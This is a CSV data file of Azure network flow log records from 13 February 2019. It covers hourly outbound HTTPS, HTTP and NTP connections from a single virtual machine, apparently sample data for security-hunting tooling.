+720,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:15.000,2019-02-13 12:15:22.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,5.0
+719,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:15.000,2019-02-13 12:15:22.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,centralus,eastus,13.89.220.65,5.0
+722,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:23.000,2019-02-13 12:57:43.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+726,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+727,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+728,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:08:45.000,2019-02-13 12:58:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+724,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:29:45.000,2019-02-13 12:29:55.000,2019-02-13 13:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['205.185.216.42', '23.4.187.27']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.4.187.27,2.0
+723,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:29:45.000,2019-02-13 12:29:55.000,2019-02-13 13:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['205.185.216.42', '23.4.187.27']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,205.185.216.42,2.0
+725,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:38:45.000,2019-02-13 12:38:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+712,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:03:33.000,2019-02-13 13:58:49.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+714,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:08:27.000,2019-02-13 13:42:35.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+717,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.194,2019-02-13 13:13:45.000,2019-02-13 13:43:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,4.0
+716,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.194,2019-02-13 13:13:45.000,2019-02-13 13:43:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+713,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:38:45.000,2019-02-13 13:38:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+715,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:58:46.000,2019-02-13 13:58:46.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+688,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 13:59:39.000,2019-02-13 14:50:51.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+682,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:04:07.000,2019-02-13 14:55:44.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,11.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,11.0
+685,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:08:46.000,2019-02-13 14:08:46.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+692,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+693,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+691,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+689,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:28:46.000,2019-02-13 14:28:46.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+690,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:52:40.000,2019-02-13 14:52:40.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+694,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:01:25.000,2019-02-13 15:55:09.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,11.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,11.0
+696,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:07:55.000,2019-02-13 15:59:07.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+695,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:08:46.000,2019-02-13 15:53:46.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,3.0
+698,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:13:47.000,2019-02-13 15:58:47.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+697,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:53:10.000,2019-02-13 15:53:11.000,2019-02-13 16:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+781,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 15:59:41.000,2019-02-13 16:58:29.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+784,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:00:51.000,2019-02-13 16:00:51.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+786,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:13:48.000,2019-02-13 16:58:48.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+782,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:14:48.000,2019-02-13 16:14:48.000,2019-02-13 17:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+785,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:16:11.000,2019-02-13 16:50:19.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+783,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:38:46.000,2019-02-13 16:38:46.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+675,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:02:56.000,2019-02-13 17:54:43.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+680,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:05:51.000,2019-02-13 17:58:49.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+681,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:05:51.000,2019-02-13 17:58:49.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+678,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:07:23.000,2019-02-13 17:58:35.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+677,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:08:46.000,2019-02-13 17:08:46.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+679,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:28:21.000,2019-02-13 17:28:21.000,2019-02-13 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+676,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:31:17.000,2019-02-13 17:31:17.000,2019-02-13 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+670,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 17:59:51.000,2019-02-13 18:57:47.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,14.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,14.0
+671,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:08:47.000,2019-02-13 18:38:47.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+673,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:13:49.000,2019-02-13 18:58:50.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+674,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:13:49.000,2019-02-13 18:58:50.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+672,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:15:39.000,2019-02-13 18:49:48.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+668,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 18:49:51.000,2019-02-13 18:51:03.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.165.175.144']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,7.0
+669,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 18:49:51.000,2019-02-13 18:51:03.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.165.175.144']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,centralus,eastus,52.165.175.144,7.0
+15,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:37.088,2019-02-13 19:02:25.000,2019-02-13 19:58:48.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+741,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,12.0
+740,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,13.89.220.65,12.0
+739,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,52.165.175.144,12.0
+16,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:38.011,2019-02-13 19:06:52.000,2019-02-13 19:58:04.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+19,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:12.179,2019-02-13 19:13:50.000,2019-02-13 19:58:50.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+17,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:11.632,2019-02-13 19:25:46.000,2019-02-13 19:25:56.000,2019-02-13 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '23.48.36.47']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+18,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:11.632,2019-02-13 19:25:46.000,2019-02-13 19:25:56.000,2019-02-13 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '23.48.36.47']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.48.36.47,2.0
+838,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:37.193,2019-02-13 19:35:52.000,2019-02-13 19:35:52.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+787,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:15.334,2019-02-13 19:36:53.000,2019-02-13 19:36:53.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+770,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:13.525,2019-02-13 19:38:47.000,2019-02-13 19:38:47.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+710,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.953,2019-02-13 20:02:50.000,2019-02-13 20:56:01.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
+711,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.953,2019-02-13 20:02:50.000,2019-02-13 20:56:01.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+704,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.173.26.181,3.0
+705,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,3.0
+703,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,3.0
+706,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.688,2019-02-13 20:08:40.000,2019-02-13 20:58:45.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+707,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.688,2019-02-13 20:08:40.000,2019-02-13 20:58:45.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+687,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.328,2019-02-13 20:08:48.000,2019-02-13 20:18:43.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.45.180.121', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+686,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.328,2019-02-13 20:08:48.000,2019-02-13 20:18:43.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.45.180.121', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.45.180.121,2.0
+718,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:23.203,2019-02-13 20:08:48.000,2019-02-13 20:08:48.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.42.24.50'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.42.24.50,1.0
+701,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.734,2019-02-13 20:08:48.000,2019-02-13 20:58:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+708,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.922,2019-02-13 20:15:08.000,2019-02-13 20:49:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+684,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.313,2019-02-13 20:18:41.000,2019-02-13 20:28:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,3.0
+683,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.313,2019-02-13 20:18:41.000,2019-02-13 20:28:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,3.0
+699,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.719,2019-02-13 20:18:42.000,2019-02-13 20:19:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.64.188.245', '13.83.148.218']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus,eastus,13.64.188.245,2.0
+700,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.719,2019-02-13 20:18:42.000,2019-02-13 20:19:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.64.188.245', '13.83.148.218']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus,eastus,13.83.148.218,2.0
+709,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.938,2019-02-13 20:19:15.000,2019-02-13 20:19:15.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.163.80'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,65.55.163.80,1.0
+702,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.641,2019-02-13 20:44:52.000,2019-02-13 20:44:52.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+30,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.795,2019-02-13 21:00:31.000,2019-02-13 21:55:37.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
